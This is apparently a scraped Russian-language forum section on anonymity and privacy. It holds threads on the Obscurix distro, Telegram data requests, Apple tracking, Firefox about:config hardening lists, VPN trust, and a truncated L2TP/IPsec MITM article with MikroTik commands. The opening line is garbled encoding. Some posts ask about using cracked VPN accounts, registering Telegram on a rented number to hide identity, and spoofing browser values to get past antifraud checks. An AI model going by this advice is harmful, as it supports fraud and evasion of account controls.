Ð¡Ð°Ð¼ÑÐ¹ Ð¸Ð·Ð²ÐµÑÑÐ½ÑÐ¹ Ð¸Ð· ÑÐµÐºÑÑÑÐ½ÑÑ Ð´Ð¸ÑÑÑÐ¸Ð±ÑÑÐ¸Ð²Ð¾Ð² â Tails , Ð¾Ð½ Ð²ÑÐ¿ÑÑÐºÐ°ÐµÑÑÑ Ñ 2009 Ð³Ð¾Ð´Ð°. Ð¢Ð°Ð¼ Ð²ÑÑ Ð¿ÑÐ¸Ð²ÑÑÐ½Ð¾ Ð¸ Ð·Ð½Ð°ÐºÐ¾Ð¼Ð¾: Ð²ÑÑÐ°Ð²Ð¸Ð» ÑÐ»ÑÑÐºÑ, Ð·Ð°Ð³ÑÑÐ·Ð¸Ð»ÑÑ, Ð¿Ð¾ÑÐ°Ð±Ð¾ÑÐ°Ð», Ð¿Ð¾ÑÐ¸ÑÑÐ¸Ð» RAM Ð·Ð° ÑÐ¾Ð±Ð¾Ð¹. ÐÑÐ¸ ÑÑÐ¾Ð¼ Ð¿ÐµÑÐ¸Ð¾Ð´Ð¸ÑÐµÑÐºÐ¸...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Он пока в альфе, но уже звучит интересно. Вопросы вызывает то, что из дистры убрали VPN, по неким причинам безопасности, вот ссылки:

https://obscurix.github.io/vpns.html

[ VPN + Tor: Not Necessarily a Net Gain - Matt Traudt

](https://web.archive.org/web/20201202014302/https://matt.traudt.xyz/posts/vpn- tor-not-mRikAa4h.html)

web.archive.org

[ TorPlusVPN · Wiki · Legacy / Trac · GitLab

](https://gitlab.torproject.org/legacy/trac/-/wikis/doc/TorPlusVPN)

Welcome to The Tor Project's Gitlab

gitlab.torproject.org

ISO файл: https://github.com/Obscurix/Obscurix/releases/download/v0.3.1-alpha/Obscurix-0.3.1-x86_64.iso

Слив переписки телеграм

ID: 676533bbb4103b69df371be6
Thread ID: 50708
Created: 2021-04-15T21:31:08+0000
Last Post: 2021-06-12T16:54:56+0000
Author: wildo
Replies: 8 Views: 2K

Такой вопрос назрел. Могут ли слить перепеску нашим властям по запросу? Не зашифрованную, которая проходит через десктоп версию.

Apple рассказала о том, как приложения собирают данные и отслеживают пользователей

ID: 676533bbb4103b69df371be8
Thread ID: 47430
Created: 2021-01-31T02:24:04+0000
Last Post: 2021-06-12T16:44:17+0000
Author: peacemaker
Replies: 6 Views: 2K

Марк Цукерберг раскритиковал предстоящие изменения в политике конфиденциальности Apple и назвал техногиганта одним из крупнейших конкурентов.

Компания Apple опубликовала отчет A Day in the Life of Your Data, иллюстрирующий, как компании отслеживают данные пользователей на web-сайтах и в приложениях. В документе также рассказывается, как функции обеспечения конфиденциальности в продуктах Apple предоставляют пользователям большую прозрачность и контроль для защиты их персональной информации.

В среднем приложения включают в себя шесть трекеров от других компаний, единственная цель которых — отслеживать пользователей и собирать их личную информацию. Большинство популярных приложений для Android и iOS имеют встроенные трекеры.

Трекеры часто встраиваются в SDK и API, которые помогают разработчикам создавать свои приложения. Внедряя трекеры, разработчики также позволяют третьим сторонам собирать и связывать данные, которыми поделились пользователи в различных приложениях, с другими собранными данными.

Брокеры данных регулярно собирают и продают, лицензируют или иным образом раскрывают третьим лицам личную информацию конкретных лиц, с которыми они не имеют прямых отношений. Сотни брокеров данных собирают данные в режиме online и offline. Один брокер собирает данные о 700 млн потребителей по всему миру, создавая профили потребителей с 5 тыс. характеристиками.

Как показали результаты исследования, почти в 20% детских приложений разработчики собирают и передают личную информацию без поддающегося проверке согласия родителей.

Компания Apple также [объявила](https://www.apple.com/newsroom/2021/01/data- privacy-day-at-apple-improving-transparency-and-empowering-users/) дату вступления в силу новых правил конфиденциальности App Tracking Transparency, призванных дать пользователю больший контроль за отслеживанием его активности. Новые правила будут внедрены весной 2021 года, когда выйдет следующая бета- версия iOS. Приложениям будет необходимо получать разрешение пользователей на отслеживание любых данных, включая уникальный идентификатор для рекламодателей (The Identifier for Advertisers, IDFA) и активность в браузере.

Генеральный директор компании Facebook Марк Цукерберг раскритиковал предстоящие изменения в политике конфиденциальности Apple и назвал техногиганта одним из крупнейших конкурентов Facebook. Как считает Цукерберг, Apple вносит изменения в политику конфиденциальности не для помощи пользователям, а для продвижения собственных продуктов. Об этом сообщил телеканал CNBC.

«У Apple есть все необходимые стимулы для использования своего доминирующего положения на платформе, чтобы вмешиваться в работу наших приложений и продуктов других разработчиков, что они регулярно и делают, отдавая предпочтение своим сервисам. Такая политика влияет на рост миллионов предприятий по всему миру, это же касается и предстоящих изменений в iOS 14», — сообщил Цукерберг.

Google, в свою очередь, [рассказала](https://www.blog.google/products/ads- commerce/preparing-developers-and-advertisers-for-policy-updates/) о том, как она намерена соблюдать новые правила. Когда политика Apple вступит в силу, компания больше не будет использовать информацию (такую как IDFA) для некоторых приложений для iOS, которые в настоящее время используют ее в рекламных целях. Поэтому техногигант не будет показывать подсказку о новой политике в данных приложениях в соответствии с руководством Apple.

IDFA (The Identifier for Advertisers) — уникальный номер, который Apple присваивает каждому устройству.
Подробнее: https://www.securitylab.ru/news/516044.php

Вопрос насчет VPN-сервисов

ID: 676533bbb4103b69df371bea
Thread ID: 52749
Created: 2021-06-10T12:45:54+0000
Last Post: 2021-06-12T04:32:30+0000
Author: arsenpadlego
Replies: 14 Views: 2K

Как вы считаете, есть ли разница между регистрацией своего аккаунта и дальнейшей оплаты VPN-сервиса(например NordVPN) и использованием взломанных аккаунтов, где сидит не один человек?
Есть ли в данном случае разница в плане безопасности? Почему-то мне кажется, что использовать ломаные аккаунты безопаснее, чем заводить свой и оплачивать подписку.

Приватный Лис

ID: 676533bbb4103b69df371beb
Thread ID: 51480
Created: 2021-05-06T18:14:27+0000
Last Post: 2021-06-10T18:29:36+0000
Author: MaFio
Prefix: Статья
Replies: 1 Views: 2K

Все мы читали и знаем о том, что браузер Firefox - компромисс удобства, безопасности и приватности при серфинге в интернете. У кого-то он основной, у других его нет, потому что любимый Chrome, а третьим вообще нужны антидетект решения, но внимания он заслуживает, и сейчас мы его настроим для повышения приватности.

На сайте я нашел много статей о сторонних плагинах к Firefox, но самые интересные настройки браузера находятся под капотом, поэтому почитатели Firefox вряд ли оставили без внимания статью "Firefox: Настройки конфиденциальности и защиты", где автор со знанием дела настраивал браузер для пентестера. И мы, продолжая хорошее дело, в этой смене попробуем это все тех обслуживание провести по- другому и ещё больше приручить Лиса.

Залезть под капот Firefox можно по адресу about:config. Зайти сюда и поменять пару параметров много времени не составит, но если у нас за 10 лет своя сборка параметров в 50-100 строк, придется процесс автоматизировать. Какие-либо сторонние утилиты нам для этого не понадобятся, а время остального чтения ещё пять минут.

Создаем файл user.js. Все! Полдела сделано, можно отдохнуть: позвать девчонок, отправить кого-нибудь в магазин, чтоб вернулся с ди-джеем, а после нескольких дней кутежа надо прописать в него настройки, которые мы систематизировали ниже. После запихать этот файл в каталог пользовательского профиля Firefox, который в Windows находится по пути C:\Users\[username]\AppData\Roaming\Mozilla\Firefox\Profiles\[random].default

Формат записей в этом файле прост: например, чтобы выключить поддержку WebRTC, необходимо задать параметру extensions.pocket.enabled значение false. В файле настроек это будет выглядеть вот так:
user_pref("extensions.pocket.enabled", false);

**Предупреждение : **от версии к версии названия настроек могут меняться, какие-то могут исчезать, другие - вводиться, поэтому такой файл время от времени нужно обновлять.

Отключаем Pocket
user_pref("extensions.pocket.api", "");
user_pref("extensions.pocket.enabled", false);
user_pref("extensions.pocket.site", "");
user_pref("extensions.pocket.oAuthConsumerKey", "");

Spoiler: Отключаем WebRTC

user_pref("media.peerconnection.enabled", false);
user_pref("media.peerconnection.ice.default_address_only", true);
user_pref("media.peerconnection.ice.no_host", true);
user_pref("media.peerconnection.ice.relay_only", true);
user_pref("media.peerconnection.ice.tcp", false);
user_pref("media.peerconnection.identity.enabled", false);
user_pref("media.peerconnection.turn.disable", true);
user_pref("media.peerconnection.use_document_iceservers", false);
user_pref("media.peerconnection.video.enabled", false);
user_pref("media.peerconnection.default_iceservers", "[]");

Геолокация
user_pref("geo.enabled", false);
user_pref("geo.provider.ms‐windows‐location", false);
user_pref("geo.wifi.uri", "");

Статистика использования браузера и различные метрики

Spoiler: Отключаем асинхронные запросы, используемые для аналитики

user_pref("beacon.enabled", false);
user_pref("browser.send_pings", false);
user_pref("browser.send_pings.require_same_host", false);

Spoiler: Отключаем метрики производительности

user_pref("dom.enable_performance", false);
user_pref("dom.enable_performance_observer", false);
user_pref("dom.enable_performance_navigation_timing", false);
user_pref("browser.slowStartup.notificationDisabled", false);
user_pref("network.predictor.enabled", false);
user_pref("network.predictor.enable-hover-on-ssl", false);
user_pref("network.prefetch-next", false);
user_pref("network.http.speculative-parallel-limit", 0);

Spoiler: Информация об установленных дополнениях

user_pref("extensions.getAddons.cache.enabled", false);

Отключаем доступ к датчикам
user_pref("device.sensors.enabled", false);
user_pref("device.sensors.orientation.enabled", false);
user_pref("device.sensors.motion.enabled", false);
user_pref("device.sensors.proximity.enabled", false);
user_pref("device.sensors.ambientLight.enabled", false);

Останавливаем фингерпринтинг
user_pref("dom.webaudio.enabled", false);
user_pref("privacy.resistFingerprinting", true);

Перекрываем информацию о сетевом соединении
user_pref("dom.netinfo.enabled", false);
user_pref("dom.network.enabled", false);

Spoiler: Отключаем использование устройств и передачу медиа

user_pref("dom.gamepad.enabled", false);
user_pref("dom.gamepad.non_standard_events.enabled", false);
user_pref("dom.imagecapture.enabled", false);
user_pref("dom.presentation.discoverable", false);
user_pref("dom.presentation.discovery.enabled", false);
user_pref("dom.presentation.enabled", false);
user_pref("dom.presentation.tcp_server.debug", false);
user_pref("media.getusermedia.aec_enabled", false);
user_pref("media.getusermedia.audiocapture.enabled", false);
user_pref("media.getusermedia.browser.enabled", false);
user_pref("media.getusermedia.noise_enabled", false);
user_pref("media.getusermedia.screensharing.enabled", false);
user_pref("media.navigator.enabled", false);
user_pref("media.navigator.video.enabled", false);
user_pref("media.navigator.permission.disabled", true);
user_pref("media.video_stats.enabled", false);
user_pref("dom.battery.enabled", false);
user_pref("dom.vibrator.enabled", false);
user_pref("dom.vr.require‐gesture", false);
user_pref("dom.vr.poseprediction.enabled", false);
user_pref("dom.vr.openvr.enabled", false);
user_pref("dom.vr.oculus.enabled", false);
user_pref("dom.vr.oculus.invisible.enabled", false);
user_pref("dom.vr.enabled", false);
user_pref("dom.vr.test.enabled", false);
user_pref("dom.vr.puppet.enabled", false);
user_pref("dom.vr.osvr.enabled", false);
user_pref("dom.vr.external.enabled", false);
user_pref("dom.vr.autoactivate.enabled", false);
user_pref("media.webspeech.synth.enabled", false);
user_pref("media.webspeech.test.enable", false);
user_pref("media.webspeech.synth.force_global_queue", false);
user_pref("media.webspeech.recognition.force_enable", false);
user_pref("media.webspeech.recognition.enable", false);

Spoiler: Отключаем телеметрию и отправку отчетов

user_pref("toolkit.telemetry.archive.enabled", false);
user_pref("toolkit.telemetry.bhrPing.enabled", false);
user_pref("toolkit.telemetry.cachedClientID", "");
user_pref("toolkit.telemetry.firstShutdownPing.enabled", false);
user_pref("toolkit.telemetry.hybridContent.enabled", false);
user_pref("toolkit.telemetry.newProfilePing.enabled", false);
user_pref("toolkit.telemetry.previousBuildID", "");
user_pref("toolkit.telemetry.reportingpolicy.firstRun", false);
user_pref("toolkit.telemetry.server", "");
user_pref("toolkit.telemetry.server_owner", "");
user_pref("toolkit.telemetry.shutdownPingSender.enabled", false);
user_pref("toolkit.telemetry.unified", false);
user_pref("toolkit.telemetry.updatePing.enabled", false);
user_pref("datareporting.healthreport.infoURL", "");
user_pref("datareporting.healthreport.uploadEnabled", false);
user_pref("datareporting.policy.dataSubmissionEnabled", false);
user_pref("datareporting.policy.firstRunURL", "");
user_pref("browser.tabs.crashReporting.sendReport", false);
user_pref("browser.tabs.crashReporting.email", false);
user_pref("browser.tabs.crashReporting.emailMe", false);
user_pref("breakpad.reportURL", "");
user_pref("security.ssl.errorReporting.automatic", false);
user_pref("toolkit.crashreporter.infoURL", "");
user_pref("network.allow‐experiments", false);
user_pref("dom.ipc.plugins.reportCrashUR", false);
user_pref("dom.ipc.plugins.flash.subprocess.crashreporter.enabled", false);

Настраиваем информацию для поиска
user_pref("browser.search.geoSpecificDefaults", false);
user_pref("browser.search.geoSpecificDefaults.url", "");
user_pref("browser.search.geoip.url", "");
user_pref("browser.search.region", "US");
user_pref("browser.search.suggest.enabled", false);
user_pref("browser.search.update", false);

Разбираемся с пуш уведомлениями
user_pref("dom.push.enabled", false);
user_pref("dom.push.connection.enabled", false);
user_pref("dom.push.serverURL", "");

Убираем утечки DNS
user_pref("network.dns.disablePrefetch", true);
user_pref("network.dns.disableIPv6", true);
user_pref("network.security.esni.enabled", true);
user_pref("network.trr.mode", 2);
user_pref("network.trr.uri", "впишите свой днс");

Отключаем перенаправления
user_pref("network.captive‐portal‐service.enabled", false);
user_pref("network.captive‐portal‐service.maxInterval", 0);
user_pref("captivedetect.canonicalURL", "");

Spoiler: Пресекаем слив данных на серверы Google

user_pref("browser.safebrowsing.allowOverride", false);
user_pref("browser.safebrowsing.blockedURIs.enabled", false);
user_pref("browser.safebrowsing.downloads.enabled", false);
user_pref("browser.safebrowsing.downloads.remote.block_dangerous", false);
user_pref("browser.safebrowsing.downloads.remote.block_dangerous_host", false); user_pref("browser.safebrowsing.downloads.remote.block_potential ly_unwanted", false); user_pref("browser.safebrowsing.downloads.remote.block_uncommon", false);
user_pref("browser.safebrowsing.downloads.remote.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.phishing.enabled", false);
user_pref("browser.safebrowsing.downloads.remote.url", "");
user_pref("browser.safebrowsing.provider.google.advisoryName", "");
user_pref("browser.safebrowsing.provider.google.advisoryURL", "");
user_pref("browser.safebrowsing.provider.google.gethashURL", "");
user_pref("browser.safebrowsing.provider.google.reportMalwareMi stakeURL", "");
user_pref("browser.safebrowsing.provider.google.reportPhishMist akeURL", "");
user_pref("browser.safebrowsing.provider.google.reportURL", "");
user_pref("browser.safebrowsing.provider.google.updateURL", "");
user_pref("browser.safebrowsing.provider.google4.advisoryName", "");
user_pref("browser.safebrowsing.provider.google4.advisoryURL", "");
user_pref("browser.safebrowsing.provider.google4.dataSharingURL", "");
user_pref("browser.safebrowsing.provider.google4.gethashURL", "");
user_pref("browser.safebrowsing.provider.google4.reportMalwareMi stakeURL", "");

Отключаем DRM
user_pref("browser.eme.ui.enabled", false);
user_pref("media.eme.enabled", false);

Эти базовые настройки помогут перекрыть основную массу собираемых данных и отключить кучу метрик.
И это просто потому, что можем!

Как доверять riseup.net почте и впн?

ID: 676533bbb4103b69df371bec
Thread ID: 47464
Created: 2021-01-31T22:09:35+0000
Last Post: 2021-06-09T13:52:57+0000
Author: user90348
Replies: 10 Views: 2K

Здравствуйте!
Использую riseup.net почту, подумал, стоит ли использовать их впн, вспомнил похожую ситуацию произошедшую с другим авторитетным хакерским форумом и провайдером впн, не помню только откуда я ее знаю.
Впн создавался специально для людей, которые занимаются нелегалом, утверждая что логи, есстесственно, не ведуться. Но спустя время, как оказалось, логи велись, кроме того, этот форум сотрудничал со спец службами, которые имея все эти логи впн проверли спец операцию по поимке киберспеступников, за всю операцию было поймано тысячи преступников(не помню сколько точно).
Вот я и задумался, раз riseup.net уже пытались завербовать, как им можно доверять, если такая ситуация спустя пару лет может повториться?
Безопаснее в таком случае свой впн, ведь VPS, на котором поднимать впн, тоже может вести логи, не так ли?

Блокируем утечку данных в firefox

ID: 676533bbb4103b69df371d6f
Thread ID: 27019
Created: 2018-12-24T17:39:50+0000
Last Post: 2019-02-14T16:04:18+0000
Author: Desoxyn
Replies: 1 Views: 2K

Знаю, что есть уже везде и как бы дикий баян, но тем не менее актуальный =) . Пусть будет и у нас, тем более статья дополненная и расширенная (можно прочекать и ваш Tor Browser, к слову).
Отмечу, что есть и куча плагинов для этого, делающих все в один клик, но здесь их рассматривать не будем
(они многое пропускают,либо блокируют не то, что нужно а иногда и делают браузер неработоспособным.)
Советую все делать руками, подбирая под себя, какие параметры вам необходимы.

Так же хочу обратить внимание, что по пути

C:\Users%YourName %\AppData\Roaming\Mozilla\Firefox\Profiles*wef34sj6*.default\prefs.js

Click to expand...

находятся ваши настройки. имя папки wef34sj6 индивидуально для каждого.
Для никсовых пользователей пути свои, но относительное расположение такое же.
Делайте копию файла до внесения изменений, тестите работоспособность, потом делайте копию файла после изменений, и используйте при переустановке браузера или переносе на другую систему.

Еще одно небольшое дополнение: подобные манипуляции не рекомендуются при посещении\работе с одним и тем же ресурсом, или при попытке обмануть антифрод.
Все нижеописанное добавляет оригинальностиотпечаткам вашего браузера, вас легче детектить,однако эти настройки блокируют утечку информации о вас и вашей системе.
Юзайте подмену значений, а не их блокировку, при попытке обхода антифрода. А так же специализированные системы\инструменты.
Наиболее часто встречаемые детекты можно посмотреть тут

Все действия проводим заходя в about:config через поиск ищем параметры.

Некоторые названия могут отличаться в зависимости от используемой версии браузера, поэтому, если скажем у вас не находит
browser.search.geoip.url
вводите
browser.search.geoip.

Так же (замечено), что иногда стирая значение в настройках, браузер действиует в соответствии с настройками по дефолту. Но иногда наоборот, при неверном или пустом значении начинает эррорить на ровном месте (бывает гораздо реже).
Потому советую выставлять нейтральное значение, к примеру если это url, то вместо blank ставить скажем http://127.0.0.1
-----------------------

Отключаем отправку отчетов:

Code:Copy to clipboard

breakpad.reportURL - сотрите значение browser.tabs.crashReporting.email - сотрите значение browser.tabs.crashReporting.emailMe - значение: false browser.tabs.crashReporting.sendReport - false datareporting.healthreport.infoURL - сотрите значение datareporting.healthreport.uploadEnabled - false datareporting.policy.dataSubmissionEnabled - false extensions.getAddons.cache.enabled - false security.ssl.errorReporting.automatic - false

Определение местоположения:

Code:Copy to clipboard

browser.geolocation.warning.infoURL - сотрите значение browser.search.countryCode - поставьте любую страну (дефолт: RU, у меня US) browser.search.geoip.url - сотрите значение browser.search.geoip.timeout - значение: 0 browser.search.geoSpecificDefaults.url - сотрите значение browser.search.geoSpecificDefaults - false browser.search.region - поставьте любую страну (дефолт: RU, у меня US) browser.search.suggest.enabled - false geo.enabled - false geo.wifi.uri - сотрите значение

Блочим доступ к аппаратным устройствам:

Code:Copy to clipboard

dom.gamepad.enabled - false dom.gamepad.non_standard_events.enable - false dom.imagecapture.enabled - false dom.presentation.discoverable - false dom.presentation.discovery.enabled - false dom.presentation.enabled - false dom.presentation.tcp_server.debug - false media.getusermedia.aec_enabled - false media.getusermedia.agc_enabled - false media.getusermedia.audiocapture.enabled - false media.getusermedia.browser.enable - false media.getusermedia.noise_enabled - false media.getusermedia.screensharing.enabled - false media.navigator.enabled - false media.navigator.permission.disabled - false media.navigator.video.enabled - false media.video_stats.enabled - false media.webspeech.recognition.enable - false dom.netinfo.enabled - false media.webspeech.recognition.enable - false media.webspeech.synth.enabled - false

Данные на сервера mozilla и google:

Code:Copy to clipboard

browser.safebrowsing.downloads.enabled - false services.sync.prefs.sync.browser.safebrowsing.downloads.enabled - false browser.safebrowsing.downloads.remote.block_dangerous_host - false browser.safebrowsing.downloads.remote.block_dangerous - false browser.safebrowsing.downloads.remote.block_potentially_unwanted - false browser.safebrowsing.downloads.remote.block_uncommon - false browser.safebrowsing.downloads.remote.enabled - false browser.safebrowsing.downloads.remote.url - оставьте пустым browser.safebrowsing.malware.enabled - false services.sync.prefs.sync.browser.safebrowsing.malware.enabled - false browser.safebrowsing.provider.google.gethashURL - false browser.safebrowsing.provider.google.lists - false browser.safebrowsing.provider.google.reportURL - сотрите значение browser.safebrowsing.provider.google.updateURL - сотрите browser.safebrowsing.provider.google.updateURL - сотрите browser.safebrowsing.provider.mozilla.lists - сотрите browser.safebrowsing.provider.mozilla.updateURL - сотрите browser.safebrowsing.reportPhishURL - сотрите services.sync.prefs.sync.browser.safebrowsing.malware.enable - false

Синхронизация (если у вас одно устройство и она вам не необходима):

Code:Copy to clipboard

identity.fxaccounts.auth.uri - сотрите services.sync.engine.addons - false services.sync.engine.bookmarks - false services.sync.engine.history - false services.sync.engine.passwors - false services.sync.engine.prefs - false services.sync.engine.tabs - false services.sync.fxa.privacyURL - сотрите services.sync.fxa.termsURL - сотрите

Телеметрия (тут думаю вопросов нет)

Code:Copy to clipboard

dom.ipc.plugins.flash.subprocess.crashreporter.enabled - false dom.ipc.plugins.reportCrashURL - false network.allow-experiments - false security.ssl.errorReporting.enabled - false toolkit.crashreporter.infoURL - сотрите значение toolkit.telemetry.archive.enable - false toolkit.telemetry.cachedClientID - сотрите toolkit.telemetry.rejected - true toolkit.telemetry.server - сотрите toolkit.telemetry.unified - false

Статистика использования:

Code:Copy to clipboard

toolkit.telemetry.enabled=false

WebRTC:

Code:Copy to clipboard

media.peerconnection.enabled - false media.peerconnection.ice.default_address_only - false media.peerconnection.ice.relay_only - true media.peerconnection.identity.enabled - false media.peerconnection.identity.timeout - 1 media.peerconnection.turn.disable - true media.peerconnection.use_document_iceservers - false media.peerconnection.video.enabled - false

Кэш:

Code:Copy to clipboard

browser.cache.disk.capacity = 0 browser.cache.disk.enable = false browser.cache.disk.smart_size.enabled = false browser.cache.disk_cache_ssl = false browser.cache.memory.enable = false browser.cache.offline.capacity = 0 browser.cache.offline.enable = false dom.indexedDB.enabled = false media.cache_size = 0 network.http.use-cache= false browser.cache.offline.enable= false browser.cache.disk.enable= false browser.cache.disk_cache_ssl= false browser.cache.memory.enable= false network.http.keep-alive.timeout = 600 network.http.max-persistent-connections-per-proxy = 16 network.cookie.lifetimePolicy = 2 network.http.sendRefererHeader = 0 network.http.sendSecureXSiteReferrer = false network.protocol-handler.external = false [Включаем все подпарамеры в значении false] network.protocol-handler.warn-external = true [Включаем все подпарамеры в значении true] network.http.pipelining = true network.http.pipelining.maxrequests = 8 network.http.proxy.keep-alive = true network.http.proxy.pipelining = true network.prefetch-next = false browser.cache.disk.enable = false browser.cache.offline.enable = false browser.sessionstore.privacy_level = 2 browser.sessionhistory.max_entries = 2 browser.display.use_document_fonts = 0 dom.battery.enabled = false intl.charsetmenu.browser.cache = ISO-8859-9, windows-1252, windows-1251, ISO-8859-1, UTF-8 extensions.blocklist.enabled = false network.proxy.no_proxies_on = (пусто) по умолчанию localhost, 127.0.0.1

Возможность хранения сайтами своих настроек:

Code:Copy to clipboard

dom.storage.enabled = false

Автоматическое обновление браузера:

Code:Copy to clipboard

app.update.auto = false app.update.enabled = false app.update.mode = 0

Обновление поисковых плагинов:

Code:Copy to clipboard

browser.search.update = fals

Отправка данных о бенчмарках браузера:

Code:Copy to clipboard

datareporting.healthreport.service.enabled = false datareporting.healthreport.uploadEnabled = false datareporting.policy.dataSubmissionEnabled = false

Откл. возможности подключения Firefox к сторонним серверам (Telefonica) без разрешения:

Code:Copy to clipboard

loop.enabled=false

Сервис для управления отложенным списком сетей (последующее прочтение:

Code:Copy to clipboard

browser.pocket.enabled=false

Отслеживание действий на сайте:

Code:Copy to clipboard

browser.send_pings - false

WebGL (лучше плагин, но ...):

Code:Copy to clipboard

webgl.disabled = true. dom.enable_performance = false dom.battery.enabled = false network.dns.disablePrefetch = true network.http.accept.default = text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Более расширенно и углубленно [тут](https://github.com/The- OP/Fox/blob/master/addendum.md) , про аддоны и т.д. там же.

(с) Статья не авторская, выборки из разных источников, я лишь систематизировал и обьединил. Потому ставить особо некого. По возможности буду дополнять.

Сервис для аренды номера телефона на долгий срок

ID: 676533bbb4103b69df371bef
Thread ID: 47516
Created: 2021-02-01T23:32:25+0000
Last Post: 2021-06-02T22:37:56+0000
Author: user90348
Replies: 9 Views: 2K

Здравствуйте!
Хочу зарегистрировать аккаунт в телеграм. Конечно же, не на свой номер.
Нужно арендовать номер, но видел номера которые можно арендовать на который срок, ~20 минут просто на прием кода для регистрации, но мне нужен номер на долгий срок что бы я в будущем смог логиниться в этот аккаунт телеграма. Желательно что бы номер был ру. Есть ли такие сервисы? Конечно, желательно что бы аренда была как можно дешевле)
Заранее спасибо!

L2TP & «IPsec with pre shared key» vs MITM

ID: 676533bbb4103b69df371bf0
Thread ID: 52339
Created: 2021-05-31T11:35:20+0000
Last Post: 2021-05-31T11:35:20+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

В статье рассмотрены основные vpn протоколы, которые на текущий момент применимы в бизнес процессах, а также углубленно освещен вопрос использования L2TP в связке с IPsec в режиме pre shared key. На практике разобраны подходы к организации виртуальных сетей на оборудовании MikroTik и выполнен практический аудит безопасности передачи данных с позиции анализа третьими лицами исходящего трафика при возможности MITM атаки.

Для начала разберем, в каких случаях бизнесу нужен vpn: при подключении удаленных сотрудников к сетевым ресурсам компании (site-to-client vpn) и при объединении территориально разнесенных сетевых элементов (site-to-site vpn). Самих протоколов vpn сейчас много: GRE , PPTP, SSTP, OVPN, L2TP, Wireguard и т.д.

С вариацией протоколов определились, какой же выбрать?
Во-первых, в зависимости от того, что строим site-to-client или site-to-site, потому что GRE для первого случая не подойдет.

Во-вторых, Wireguard хоть молодой, простой и очень перспективный, но на офисном маршрутизаторе Cisco или MikroTik его не поднять, вендоры даже не планируют внедрять. PPTP очень легок в настройке, однако будет либо не шифрованным, либо шифрованным протоколом MPPE, который не имеет аппаратной разгрузки, в следствие чего, многопользовательскую сеть замедлит в работе. SSTP отличный протокол, работает по TLS в UDP на 443 порту, пролезет через любой Firewall, а может даже и IDS. У некоторых вендоров, например, MikroTik, может работать по pre shared key вместо сертификата, запускается на Windows клиентах из коробки.

Из минусов: определенные танцы с бубном при настройке Linux клиентов (протокол все-таки от Microsoft) и отсутствие поддержки со стороны вендоров в аппаратной разгрузке. OpenVPN всем хорош, особенно высокой гибкостью. Можно туннелировать на L2, можно на L3, всего не перечислить. Не даром он open soft. Роутер MikroTik скоро научится работать с ним по UDP (ожидается в следующем поколении RouterOS), так как смысла в TCP нет, ведь соединение все равно проверяется во вложенном туннеле. Однако, скорее всего ваша офисная Cisco не умеет с ним работать, поэтому vpn сервер из нее не организовать.

Фактически, стандартом де-факто в корпоративной среде является протокол L2TP. Он работает на UDP, порт по умолчанию 1701. С шифрованием все хорошо, особенно наличие возможности аппаратной разгрузки IPsec. Есть вероятность, что ваш корпоративный MikroTik (несмотря на то, что он софтовый маршрутизатор) умеет шифровать IPsec на железе (смотри таблицу «Hardware acceleration» на сайте производителя ). У Cisco в этом вопросе дела обстоят еще лучше. Даже если ваш офисный роутер не умеет шифровать железом, никто кроме вас это знать ~~не должен~~ не будет.

Итак, подведем промежуточный итог: vpn технологии бизнесу нужны, использовать лучше всего L2TP. Закончив с затянувшейся вводной частью, перейдем непосредственно к теме статьи. Рассмотрим на примере оборудования MikroTik безопасность передачи данных в туннеле при возможности MITM атаки со стороны третьих лиц. Этот вопрос возникает в следствие того, что почти всегда в корпоративной среде используют L2TP в связке с IPsec в туннельном режиме и общим ключем для всей сети, вместо создания PKI и задействования сертификатов. Это удобно, сеть быстро разворачивается и легко обслуживается. Безопасно ли это в условиях компрометации pre shared key? Разберем на практике.

— Начнем с того, что L2TP может быть не шифрованным:

Code:Copy to clipboard

/ppp profile name=test use-encryption=no

— с интегрированным в протокол шифрованием MPPE:

Code:Copy to clipboard

/ppp profile name=test use-encryption=yes (или require, при этом IPsec отключен)

— с качественным внешним шифрованием от IPsec, вроде AES:

Code:Copy to clipboard

/ppp profile name=test use-encryption=yes (или require, при этом IPsec включен)

Настройка L2TP сервера осуществляется достаточно просто, активируем его и указываем тип аутентификации:

Code:Copy to clipboard

/interface l2tp-server server set authentication=mschap2 default-profile=test enabled=yes

Здесь же появляется возможность сразу активировать IPsec и настроить pre shared key. Если это сделать, то общий ключ будет закреплен за всей vpn сетью и передан всем ее участникам в качестве настроечной информации. Один и тот же на всех. На самом деле, если активировать IPsec таким образом, то RouterOS автоматически создает необходимые настройки в соответствующем разделе /ip ipsec сразу после установления L2TP соединения.

Конкретно речь идет:

IPsec Policy с указанными протоколом UDP и портом подключения 1701;

IPsec Peer c IP адресами сервера и клиента;

IPsec Identity с указанным ранее pre shared key.

Автоматически созданные настройки IPsec

Очень удобно. Особенно, когда IP адреса динамические и вообще натированные. Клиентам не нужно выполнять лишние процедуры по отслеживанию их текущих значений. В RouterOS в разделе L2TP есть дополнительная настройка, определяющая общий секрет при конфигурировании в сетях Virtual Private DialUp Network протяженных соединений точка-точка между удаленным сервером PPPOE и L2TP сетью, но это к теме статьи не относиться, поэтому просто ее упомянем ~~всуе~~ :

Code:Copy to clipboard

/ppp l2tp-secret add address=0.0.0.0/0 secret=

Допустим, мы не хотим простого счастья и дополнительно желаем, чтобы у каждого клиента был индивидуальный сертификат вместо общего ключа (возможно, для этого в компании уже все готово). Звучит очень круто и безопасно. Нет технически не преодолимых проблем, кроме танцев с бубнами: создаем все вышеперечисленное в ручном режиме, не забываем про корректно заданные IP адреса, как со стороны сервера, так и со стороны клиентов.

Code:Copy to clipboard

/ip ipsec peer add address=IP local-address=IP name=peer1 /ip ipsec identity add peer=peer1 auth-method=digital-signature certificate=u01.crt_0 /ip ipsec policy add dst-address=IP dst-port=1701 peer=peer1 protocol=udp src-address=IP src-port=1701

Здесь нас поджидает кропотливая работа, ведь, скорее всего, адреса у клиентов меняются (и достаточно часто), кроме этого клиенты сидят за провайдорским NAT. Все это можно накрутить кастомными скриптами на RouterOS, и все будет отлично работать. Нужно ли это? Cмоделируем ситуацию, когда общий для всех pre shared key стал известен злоумышленнику, который целенаправленно хочет нам навредить. Или клиент vpn нам больше не клиент. Сразу баним его учетную запись, и теперь аутентификацию mschap2 (или какая у вас там выбрана) он не пройдет и доступ не получит:

Code:Copy to clipboard

/ppp secret disable bad_user

